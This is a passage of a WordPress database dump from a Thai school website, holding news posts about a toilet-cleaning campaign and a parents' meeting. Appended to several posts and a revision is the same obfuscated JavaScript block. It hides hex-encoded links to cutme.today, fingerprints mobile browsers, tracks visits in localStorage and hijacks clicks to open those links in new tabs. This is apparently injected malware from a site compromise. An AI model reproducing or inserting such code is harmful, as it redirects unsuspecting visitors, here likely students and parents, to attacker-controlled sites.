\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-26','','','2024-08-01 20:43:38','2024-08-01 13:43:38','',0,'http://pakhaeng.ssk.in.th/?p=414',0,'post','',0),
(415,1,'2024-08-01 20:43:26','2024-08-01 13:43:26','','15-67','','inherit','','closed','','15-67','','','2024-08-01 20:43:26','2024-08-01 13:43:26','',414,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/15-67.png',0,'attachment','image/png',0),
(416,1,'2024-08-01 20:43:36','2024-08-01 13:43:36','<!-- wp:paragraph -->\n<p><strong>\"สุขาดี  มีความสุข\"</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>เมื่อวันที่ 6 พฤษภาคม พ.ศ.2567 นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน นำคณะครู และบุคลากรทางการศึกษา ร่วมสวมใส่เสื้อสีเหลือง ร่วมกันทำความสะอาดห้องสุขา ตามโครงการ “สุขาดี มีความสุข” ตามสนองนโยบาย สพฐ. เพื่อให้โรงเรียนมีห้องสุขา ที่สะอาด ถูกสุขลักษณะและปลอดภัย เพื่อให้พร้อมใช้กับตณะครู และนักเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":415,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/15-67-724x1024.png\" alt=\"\" class=\"wp-image-415\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','414-revision-v1','','','2024-08-01 20:43:36','2024-08-01 13:43:36','',414,'http://pakhaeng.ssk.in.th/?p=416',0,'revision','',0),
(417,1,'2024-08-01 20:44:53','2024-08-01 13:44:53','<!-- wp:paragraph -->\n<p>ประชุมผู้ปกครองนักเรียน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>เมื่อวันที่ 13 พฤษภาคม พ.ศ.2567 นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน ร่วมกับคณะครู และบุคลากรทางการศึกษา จัดประชุมผู้ปกครองนักเรียน เพื่อเตรียมความพร้อมก่อนเปิดภาคเรียน ประจำปีการศึกษา 2567</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":418,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/16-67-724x1024.png\" alt=\"\" class=\"wp-image-418\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 